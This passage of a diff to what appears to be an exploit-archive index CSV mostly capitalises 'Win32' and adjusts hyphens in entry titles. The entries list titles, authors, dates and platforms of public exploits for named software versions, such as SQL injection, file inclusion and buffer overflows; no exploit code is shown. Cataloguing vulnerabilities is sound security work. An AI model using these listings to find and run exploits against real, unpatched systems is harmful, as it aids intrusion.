Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (linux)",2007-04-30,vade79,linux,remote,0 -3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (win32)",2007-04-30,vade79,windows,remote,0 +3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (Win32)",2007-04-30,vade79,windows,remote,0 3823,platforms/windows/local/3823.c,"Winamp <= 5.34 - (.mp4) Code Execution Exploit",2007-04-30,Marsu,windows,local,0 3824,platforms/php/webapps/3824.txt,"Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 3825,platforms/php/webapps/3825.txt,"Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 @@ -3563,7 +3563,7 @@ id,file,description,date,author,platform,type,port 3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 (splash.lang.php) Remote File Inclusion Vulnerability",2007-05-12,"ThE TiGeR",php,webapps,0 3910,platforms/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service Exploit",2007-05-12,shinnai,windows,dos,0 3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability",2007-05-14,CyberGhost,php,webapps,0 -3912,platforms/windows/local/3912.c,"notepad++ 4.1 ruby file processing Buffer Overflow Exploit (win32)",2007-05-12,vade79,windows,local,0 +3912,platforms/windows/local/3912.c,"notepad++ 4.1 ruby file processing Buffer Overflow Exploit (Win32)",2007-05-12,vade79,windows,local,0 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit",2007-05-12,vade79,windows,remote,8080 3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 (archshow.asp var) Remote SQL Injection Vulnerability",2007-05-13,gsy,asp,webapps,0 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 (g_pcltar_lib_dir) RFI Vulnerabilities",2007-05-13,Mogatil,php,webapps,0 @@ -3862,7 +3862,7 @@ id,file,description,date,author,platform,type,port 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - Explorer.exe Gif Image Denial of Service Exploit",2007-07-23,DeltahackingTEAM,windows,dos,0 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit",2007-07-23,deusconstruct,linux,dos,0 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow Exploit",2007-07-24,"Jared DeMott",windows,remote,0 -4218,platforms/windows/local/4218.php,"PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 +4218,platforms/windows/local/4218.php,"PHP 5.2.3 Win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 4219,platforms/php/webapps/4219.txt,"Confixx Pro <= 3.3.1 - (saveserver.php) Remote File Inclusion Vulnerability",2007-07-24,"H4 / XPK",php,webapps,0 4220,platforms/php/webapps/4220.pl,"Entertainment CMS (Local Inclusion) Remote Command Execution Exploit",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory (index.php page) Remote File Inclusion Vulnerability",2007-07-24,mozi,php,webapps,0 @@ -3880,7 +3880,7 @@ id,file,description,date,author,platform,type,port 4233,platforms/aix/local/4233.c,"IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit",2007-07-27,qaaz,aix,local,0 4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 4235,platforms/php/webapps/4235.txt,"Seditio CMS <= 121 - (pfs.php) Remote File Upload Vulnerability",2007-07-27,A.D.T,php,webapps,0 -4236,platforms/windows/local/4236.php,"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 +4236,platforms/windows/local/4236.php,"PHP 5.x (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit",2007-07-27,h07,windows,remote,0 4238,platforms/php/webapps/4238.txt,"Adult Directory (cat_id) Remote SQL Injection Vulnerability",2007-07-27,t0pP8uZz,php,webapps,0 4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 (comments_get.asp id) Remote SQL Injection Vulnerability",2007-07-28,g00ns,asp,webapps,0 @@ -3937,7 +3937,7 @@ id,file,description,date,author,platform,type,port 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 -4293,platforms/windows/dos/4293.php,"PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)",2007-08-18,boecke,windows,dos,0 +4293,platforms/windows/dos/4293.php,"PHP <= 5.2.0 (php_Win32sti) Local Buffer Overflow PoC (Win32)",2007-08-18,boecke,windows,dos,0 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD Remote Preauth Stack Based Overrun PoC",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart <= 1.x.x - (cart.php) Remote File Inclusion Vulnerability",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - Remote SQL Injection Vulnerability",2007-08-20,k1tk4t,php,webapps,0 @@ -3946,8 +3946,8 @@ id,file,description,date,author,platform,type,port 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BoF Exploit",2007-08-21,rgod,windows,remote,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 (category_id) Remote SQL Injection Vulnerability",2007-08-21,k1tk4t,php,webapps,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit",2007-08-22,ZhenHan.Liu,windows,remote,25 -4302,platforms/windows/local/4302.php,"PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 -4303,platforms/windows/local/4303.php,"PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)",2007-08-22,NetJackal,windows,local,0 +4302,platforms/windows/local/4302.php,"PHP <= 5.2.3 (php_Win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 +4303,platforms/windows/local/4303.php,"PHP <= 5.2.3 (php_Win32sti) Local Buffer Overflow Exploit (2)",2007-08-22,NetJackal,windows,local,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC",2007-08-23,shinnai,windows,dos,0 4305,platforms/php/webapps/4305.txt,"Joomla Component NeoRecruit <= 1.4 (id) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 4306,platforms/php/webapps/4306.txt,"Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 @@ -3962,7 +3962,7 @@ id,file,description,date,author,platform,type,port 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Auth EIP Overwrite Exploit",2007-08-26,Heretic2,windows,remote,25 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion Vulnerability",2007-08-26,bd0rk,php,webapps,0 -4318,platforms/windows/dos/4318.php,"PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)",2007-08-27,boecke,windows,dos,0 +4318,platforms/windows/dos/4318.php,"PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (Win32)",2007-08-27,boecke,windows,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service Exploit",2007-08-27,MADYNES,hardware,dos,0 4320,platforms/php/webapps/4320.txt,"SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability",2007-08-27,Katatafish,php,webapps,0 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow Exploit (0day)",2007-08-27,bannedit,linux,remote,0 @@ -4395,7 +4395,7 @@ id,file,description,date,author,platform,type,port 4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x - (search.php type) Remote SQL Injection Vulnerability",2007-12-18,Koller,php,webapps,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow Exploit",2007-12-18,"SYS 49152",windows,local,0 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 -4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 +4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (Win32) (pl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) RFI Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - Bluetooth Stack Local Root Exploit",2007-12-18,Backdoored,linux,local,0 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 @@ -4714,7 +4714,7 @@ id,file,description,date,author,platform,type,port 5076,platforms/php/webapps/5076.txt,"Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0 5077,platforms/windows/local/5077.cpp,"Total Video Player 1.20 M3U File Local Stack Buffer Overflow Exploit",2008-02-07,"fl0 fl0w",windows,local,0 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager <= 7.0.1 File Upload Exploit",2008-02-07,titon,windows,remote,0 -5079,platforms/windows/remote/5079.c,"SapLPD 6.28 - Remote Buffer Overflow Exploit (win32)",2008-02-07,BackBone,windows,remote,515 +5079,platforms/windows/remote/5079.c,"SapLPD 6.28 - Remote Buffer Overflow Exploit (Win32)",2008-02-07,BackBone,windows,remote,515 5080,platforms/php/webapps/5080.txt,"Joomla Component com_doc Remote SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0 5081,platforms/php/webapps/5081.txt,"Joomla Component com_noticias 1.0 - SQL Injection Vulnerability",2008-02-07,xcorpitx,php,webapps,0 5082,platforms/php/webapps/5082.txt,"PowerNews (Newsscript) 2.5.6 - Local File Inclusion Vulnerabilities",2008-02-08,DSecRG,php,webapps,0 @@ -4741,7 +4741,7 @@ id,file,description,date,author,platform,type,port 5103,platforms/php/webapps/5103.txt,"Joomla Component rapidrecipe <= 1.6.5 - SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess <= 0.8 - Remote SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0 -5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client WFICA.OCX ActiveX - Heap BoF Exploit",2008-02-12,Elazar,windows,remote,0 +5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX - Heap BoF Exploit",2008-02-12,Elazar,windows,remote,0 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - (.wps) Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion Vulnerability",2008-02-13,GoLd_M,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 @@ -4961,7 +4961,7 @@ id,file,description,date,author,platform,type,port 5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Exploit",2008-03-31,"Iron Team",windows,dos,0 5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability",2008-03-31,N/A,php,webapps,0 -5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)",2008-03-31,Heretic2,windows,remote,80 +5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (Win32)",2008-03-31,Heretic2,windows,remote,80 5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 (articleId) Remote SQL Injection Vulnerability",2008-03-31,IRCRASH,php,webapps,0 5332,platforms/windows/remote/5332.html,"Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit",2008-04-01,Elazar,windows,remote,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit",2008-04-01,IRCRASH,php,webapps,0 @@ -5148,7 +5148,7 @@ id,file,description,date,author,platform,type,port 5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 -5518,platforms/windows/local/5518.txt,"Microsoft Windows XP SP2 - (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 +5518,platforms/windows/local/5518.txt,"Microsoft Windows XP SP2 - (Win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability",2008-04-28,HaCkeR_EgY,php,webapps,0 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability",2008-04-29,"Roberto Suggi Liverani",php,webapps,0 @@ -5711,7 +5711,7 @@ id,file,description,date,author,platform,type,port 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 (index.php page) SQL Injection Vulnerability",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe (folder.php id) Remote SQL Injection Vulnerability",2008-07-18,n0ne,php,webapps,0 -6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (win32)",2008-07-18,Unohope,windows,remote,80 +6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 @@ -5971,7 +5971,7 @@ id,file,description,date,author,platform,type,port 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local .M3U File Stack Buffer Overflow Exploit",2008-09-06,"fl0 fl0w",windows,local,0 6390,platforms/php/webapps/6390.txt,"IntegraMOD 1.4.x - (Insecure Directory) Download Database Vulnerability",2008-09-06,TheJT,php,webapps,0 6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit",2008-09-06,LiquidWorm,windows,dos,0 -6392,platforms/php/webapps/6392.php,"Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (win32)",2008-09-06,Raz0r,php,webapps,0 +6392,platforms/php/webapps/6392.php,"Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (Win32)",2008-09-06,Raz0r,php,webapps,0 6393,platforms/php/webapps/6393.pl,"MemHT Portal <= 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 6394,platforms/hardware/dos/6394.pl,"Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC",2008-09-07,"Alex Hernandez",hardware,dos,0 6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module <= 3.0 (ordercode) SQL Injection Vuln",2008-09-07,BugReport.IR,php,webapps,0 @@ -6428,7 +6428,7 @@ id,file,description,date,author,platform,type,port 6862,platforms/php/webapps/6862.txt,"H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability",2008-10-29,Stack,php,webapps,0 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Exploit",2008-10-29,"Jeremy Brown",windows,dos,0 6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability",2008-10-29,GoLd_M,cgi,webapps,0 -6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1- (fd/upload/dt) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 +6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (fd/upload/dt) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 6866,platforms/php/webapps/6866.pl,"7Shop <= 1.1 - Remote Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6867,platforms/php/webapps/6867.pl,"Wordpress Plugin e-Commerce <= 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard <= 1.0.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 @@ -7000,7 +7000,7 @@ id,file,description,date,author,platform,type,port 7456,platforms/php/webapps/7456.txt,"Availscript Article Script Remote File Upload Vulnerability",2008-12-14,S.W.A.T.,php,webapps,0 7457,platforms/php/webapps/7457.txt,"Availscript Classmate Script Remote File Upload Vulnerability",2008-12-14,S.W.A.T.,php,webapps,0 7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 (index.php lang) Local File Inclusion Vulnerability",2008-12-14,Osirys,php,webapps,0 -7459,platforms/php/webapps/7459.txt,"CFAGCMS 1- Remote File Inclusion Vulnerabilities",2008-12-14,BeyazKurt,php,webapps,0 +7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion Vulnerabilities",2008-12-14,BeyazKurt,php,webapps,0 7460,platforms/windows/dos/7460.html,"EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC",2008-12-14,Bl@ckbe@rD,windows,dos,0 7461,platforms/php/webapps/7461.txt,"Flatnux html/javascript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection Vulnerability",2008-12-14,AlpHaNiX,asp,webapps,0 @@ -7890,7 +7890,7 @@ id,file,description,date,author,platform,type,port 8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",php,webapps,0 8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 (Auth Bypass) SQL Injection Vulnerability",2009-04-09,Osirys,php,webapps,0 8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 -8384,platforms/linux/remote/8384.txt,"net2ftp <= 0.97 Cross-Site Scripting/Request Forgery Vulnerabilities",2009-04-09,cicatriz,linux,remote,0 +8384,platforms/linux/remote/8384.txt,"net2ftp <= 0.97 - Cross-Site Scripting/Request Forgery Vulnerabilities",2009-04-09,cicatriz,linux,remote,0 8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",php,webapps,0 8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - (Auth Bypass) SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",php,webapps,0 8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 @@ -8296,7 +8296,7 @@ id,file,description,date,author,platform,type,port 8796,platforms/php/webapps/8796.htm,"Gallarific (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0 8797,platforms/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8798,platforms/windows/dos/8798.rb,"Safari RSS feed:// Buffer Overflow via libxml2 Exploit PoC",2009-05-26,"Kevin Finisterre",windows,dos,0 -8799,platforms/windows/local/8799.txt,"PHP <= 5.2.9 - Local Safemod Bypass Exploit (win32)",2009-05-26,Abysssec,windows,local,0 +8799,platforms/windows/local/8799.txt,"PHP <= 5.2.9 - Local Safemod Bypass Exploit (Win32)",2009-05-26,Abysssec,windows,local,0 8801,platforms/php/webapps/8801.txt,"Joomla Component com_rsgallery2 1.14.x/2.x - Remote Backdoor Vuln",2009-05-26,"Jan Van Niekerk",php,webapps,0 8802,platforms/php/webapps/8802.txt,"Kensei Board <= 2.0.0b - Multiple SQL Injection Vulnerabilities",2009-05-26,cOndemned,php,webapps,0 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 (Auth Bypass) Remote SQL Injection Vulnerability",2009-05-26,"ThE g0bL!N",php,webapps,0 @@ -8456,7 +8456,7 @@ id,file,description,date,author,platform,type,port 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass Vulnerability",2009-06-15,"Tom Neaves",hardware,remote,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player Add-On HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0 -8966,platforms/php/webapps/8966.txt,"phportal 1- (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0 +8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 URL Processing Buffer Overflow Exploit (meta)",2009-06-16,Trancer,windows,remote,0 @@ -8587,7 +8587,7 @@ id,file,description,date,author,platform,type,port 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BoF Exploit (SEH)",2009-07-10,His0k4,windows,local,0 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 (uid) Remote SQL Injection Vulnerability",2009-07-10,Monster-Dz,php,webapps,0 -9106,platforms/windows/remote/9106.txt,"citrix xencenterweb (xss/sql/rce) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 +9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (xss/sql/rce) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,IRCRASH,php,webapps,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection Vulnerability/RCE Exploit",2009-07-10,darkjoker,php,webapps,0 @@ -8735,7 +8735,7 @@ id,file,description,date,author,platform,type,port 9260,platforms/php/webapps/9260.txt,"skadate dating (rfi/lfi/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9261,platforms/php/webapps/9261.txt,"xoops celepar module qas (bsql/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (sql/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9263,platforms/php/webapps/9263.txt,"URA 3.0 (cat) remote SQL Injection Vulnerability",2009-07-27,"Chip d3 bi0s",php,webapps,0 +9263,platforms/php/webapps/9263.txt,"URA 3.0 (cat) Remote SQL Injection Vulnerability",2009-07-27,"Chip d3 bi0s",php,webapps,0 9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - (LFI/SQL) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0 @@ -8772,7 +8772,7 @@ id,file,description,date,author,platform,type,port 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - (.mpf) Local Stack Overflow Exploit (update)",2009-07-30,corelanc0d3r,windows,local,0 9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service PoC",2009-07-30,kingcope,multiple,dos,0 -9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - (win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0 +9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - (Win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 - (.xbm) Local Buffer Overflow Exploit",2009-07-30,His0k4,linux,local,0 9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f smb:// URI Handling Remote BoF Exploit",2009-07-30,"Pankaj Kohli",windows,remote,0 9304,platforms/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash Exploit",2009-07-30,LiquidWorm,windows,dos,0 @@ -9190,7 +9190,7 @@ id,file,description,date,author,platform,type,port 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 -9800,platforms/windows/remote/9800.cpp,"Serv-u Web client 9.0.0.5 Buffer Overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80 +9800,platforms/windows/remote/9800.cpp,"Serv-u Web client 9.0.0.5 - Buffer Overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion Vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 @@ -9268,7 +9268,7 @@ id,file,description,date,author,platform,type,port 9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 